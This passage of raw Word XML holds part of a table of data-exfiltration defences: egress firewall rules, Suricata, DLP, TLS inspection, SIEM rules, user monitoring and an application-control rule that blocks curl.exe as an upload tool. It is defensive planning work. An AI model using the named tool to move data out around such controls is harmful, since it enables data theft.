              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Firewall or network rule to block outgoing traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78D29482" w14:textId="1229E3E1" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="004C64DB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Prevent</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> unknown outbound uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A5AEB3" w14:textId="4E578509" w:rsidR="1E0EC8B7" w:rsidRDefault="3CA4D6E1" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Configure firewall to allow outbound traffic to approved IPs and ports</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63212538" w14:textId="30196849" w:rsidR="1E0EC8B7" w:rsidRDefault="6BBFDBE2" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Blocking unknown destinations</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0734417F" w14:textId="0BEC5A72" w:rsidR="1E0EC8B7" w:rsidRDefault="6BBFDBE2" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Logging denied connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w14:paraId="33A8A18C" w14:textId="11730128" w:rsidTr="6BBFDBE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="567C73EB" w14:textId="40DE06CD" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="65116661">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Network IDS/IPS (Suricata)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F77D80F" w14:textId="19EC9E68" w:rsidR="004C64DB" w:rsidRDefault="006D13F1" w:rsidP="006D13F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security system that monitors network traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="094D4AB5" w14:textId="7B48C4E0" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="004C64DB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Detect data exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736F7661" w14:textId="39CA498C" w:rsidR="1E0EC8B7" w:rsidRDefault="6BBFDBE2" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Deploy Suricata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B61C27" w14:textId="7E61B2D6" w:rsidR="1E0EC8B7" w:rsidRDefault="6BBFDBE2" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Add rules to detect exfiltration attempts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBEC70C" w14:textId="37434AD1" w:rsidR="1E0EC8B7" w:rsidRDefault="66C69A41" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Send alerts to SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w14:paraId="3363C822" w14:textId="5D85DC94" w:rsidTr="6BBFDBE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="755E3A10" w14:textId="1EF91BE5" w:rsidR="004C64DB" w:rsidRPr="00194137" w:rsidRDefault="004C64DB" w:rsidP="65116661">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Data Loss Prevention (DLP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AE662A9" w14:textId="6643A9E5" w:rsidR="004C64DB" w:rsidRDefault="006D13F1" w:rsidP="006D13F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Software that monitors and control sensitive data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76EDF60F" w14:textId="68C407BE" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="004C64DB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Block sensitive data to be sent out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25973530" w14:textId="335C8A03" w:rsidR="1E0EC8B7" w:rsidRDefault="1655632F" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Classify sensitive data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F5DA59C" w14:textId="1D892D13" w:rsidR="1E0EC8B7" w:rsidRDefault="1655632F" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Set DLP policies to block upload of sensitive data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71AB50FF" w14:textId="6E571B63" w:rsidR="1E0EC8B7" w:rsidRDefault="1655632F" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Alert when data is uploaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w14:paraId="38AC02D1" w14:textId="3FDAADAB" w:rsidTr="6BBFDBE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B4DA88" w14:textId="66D73A2B" w:rsidR="004C64DB" w:rsidRPr="00194137" w:rsidRDefault="004C64DB" w:rsidP="65116661">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Application Control (Windows Defender Application Control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A3043F6" w14:textId="114A56DC" w:rsidR="004C64DB" w:rsidRDefault="006D13F1" w:rsidP="006D13F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security setting to restrict which program can run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48B24D20" w14:textId="471D33F5" w:rsidR="004C64DB" w:rsidRDefault="004B0E85" w:rsidP="004C64DB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Prevents execution of curl.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64E4717B" w14:textId="044F913B" w:rsidR="1E0EC8B7" w:rsidRDefault="7C7A6E0C" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Create rules to allow only approved applications</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6191821D" w14:textId="110BC447" w:rsidR="1E0EC8B7" w:rsidRDefault="46E8AD3B" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Block unauthorised programs like curl.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BA40F0" w14:textId="50A86804" w:rsidR="1E0EC8B7" w:rsidRDefault="45620BAC" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Log blocked executions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w14:paraId="164B6132" w14:textId="0636379E" w:rsidTr="6BBFDBE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2172D7D6" w14:textId="2EA64028" w:rsidR="004C64DB" w:rsidRPr="00194137" w:rsidRDefault="004C64DB" w:rsidP="65116661">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">TLS inspection </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DCEEC48" w14:textId="4C7E802C" w:rsidR="004C64DB" w:rsidRDefault="006D13F1" w:rsidP="006D13F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Technology to inspect encrypted traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B9D4D38" w14:textId="1CDF4937" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="004C64DB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Detect encrypted exfiltration like encrypted file upload hidden in HTTPS traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2635EE8C" w14:textId="339C16E8" w:rsidR="1E0EC8B7" w:rsidRDefault="5CCBBFC3" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Configure secure web gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612D5FD2" w14:textId="1F78D4C3" w:rsidR="1E0EC8B7" w:rsidRDefault="3749B39A" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Decrypt outbound TLS traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DBE473E" w14:textId="322C31AF" w:rsidR="1E0EC8B7" w:rsidRDefault="118892DA" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Inspect to look for suspicious uploads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD7D11D" w14:textId="50008B20" w:rsidR="1E0EC8B7" w:rsidRDefault="71413687" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Encrypt traffic before forwarding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w14:paraId="403053BD" w14:textId="0F6DDC0E" w:rsidTr="6BBFDBE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="423400CA" w14:textId="5DE15410" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="65116661">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SIEM correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="600F25F7" w14:textId="64F983E1" w:rsidR="004C64DB" w:rsidRDefault="006D13F1" w:rsidP="006D13F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Security tool that collects and analyses logs </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A76ED78" w14:textId="0C443BF9" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="004C64DB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Detect abnormal uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F249997" w14:textId="00AA7821" w:rsidR="1E0EC8B7" w:rsidRDefault="0ABF98DA" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Collect logs from endpoints</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A070A8" w14:textId="4B69C3E1" w:rsidR="1E0EC8B7" w:rsidRDefault="6D7FEF79" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Create rules to detect and alert suspicious uploads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="113A3FD8" w14:textId="02553FDD" w:rsidR="1E0EC8B7" w:rsidRDefault="19EB223A" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Map detections to MITRE ATT&amp;CK </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w14:paraId="7879BA7F" w14:textId="6284701A" w:rsidTr="6BBFDBE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F0A648" w14:textId="74B40A7D" w:rsidR="004C64DB" w:rsidRPr="00194137" w:rsidRDefault="004C64DB" w:rsidP="65116661">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>User activity monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1327C9E9" w14:textId="03C9D07B" w:rsidR="004C64DB" w:rsidRDefault="006D13F1" w:rsidP="006D13F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>System that tracks user actions on devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="563B6587" w14:textId="6593952A" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="004C64DB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Identify unusual file access or activity which helps in identifying insider threats or compromised accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F639780" w14:textId="7B126ED3" w:rsidR="1E0EC8B7" w:rsidRDefault="4E22224B" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Enable endpoint logging</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32505795" w14:textId="6FAD7F58" w:rsidR="1E0EC8B7" w:rsidRDefault="540ECF98" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Track file access to sensitive directories</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4860A61F" w14:textId="64295849" w:rsidR="1E0EC8B7" w:rsidRDefault="131536F4" w:rsidP="00000E6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Alert on unusual access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
